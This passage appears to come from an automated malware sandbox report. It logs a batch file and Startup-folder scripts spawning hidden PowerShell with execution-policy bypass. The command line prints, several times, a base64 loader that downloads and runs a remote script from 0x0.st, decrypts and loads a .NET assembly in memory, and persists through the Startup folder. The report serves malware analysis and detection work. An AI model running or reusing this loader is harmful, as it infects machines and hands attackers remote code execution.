"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Maps a DLL or memory area into another process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: NULL target: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: NULL target: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: NULL target: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\5kldoushde.bat" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\xdlilvqihrr"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\ixqamojjvzjpuah"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\ixqamojjvzjpuah"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\savtmytdjhbuwgvpuw"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\savtmytdjhbuwgvpuw"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f1e01fdf.cmd" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_df859eae.cmd" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_81f4ce5e.cmd" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbn